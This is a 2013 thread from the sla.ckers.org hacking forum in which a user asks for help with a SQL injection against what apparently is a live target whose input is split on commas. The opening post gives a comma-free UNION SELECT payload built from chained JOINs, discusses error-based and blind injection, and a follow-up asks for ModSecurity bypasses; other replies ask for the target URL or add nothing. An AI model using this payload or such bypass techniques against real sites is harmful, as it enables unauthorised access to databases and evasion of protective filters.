Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Tricky SQL injection.
Posted by: Error_403
Date: August 17, 2013 01:49PM

Hi guys,


i have an injection i imagine looks like this:

$array = explode("," $_GET['vuln']);

for ( ............ ) {

//SQL

}

Post request looks like this:

id=value1,value2,value3,value4

As you can see commas are removed from the input so i have tried using JOIN like this

id=VALUE1+'+and+1>2+UNION SELECT * FROM+(select 1)a join (select 2)b join (select 3)c join (select 4)d join (select 5)e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k--+',VALUE2,VALUE3,VALUE4

There is no output so i wanted to try an error based injection but functions such as extractvalue(), name_const(), rand(), each require more than 1 parameter and therefore require a comma.


Blind works but the hosts connection is very slow.


Anybody have any ideas?

Options: ReplyQuote
Re: Tricky SQL injection.
Posted by: Error_403
Date: August 17, 2013 01:53PM

Also i have another injection point but GET requests are protected by mod security.

If anybody has some bypass for mod security rules from 2012-2013 let me know :D

Options: ReplyQuote
Re: Tricky SQL injection.
Posted by: winwalk
Date: October 01, 2013 02:45AM

Blind works but the hosts connection is very slow.

Options: ReplyQuote
Re: Tricky SQL injection.
Posted by: jammy99
Date: October 01, 2013 12:47PM

please pm me url

Options: ReplyQuote
Re: Tricky SQL injection.
Posted by: pridzx
Date: October 18, 2013 12:42AM

thank you for goods.

Options: ReplyQuote


Sorry, only registered users may post in this forum.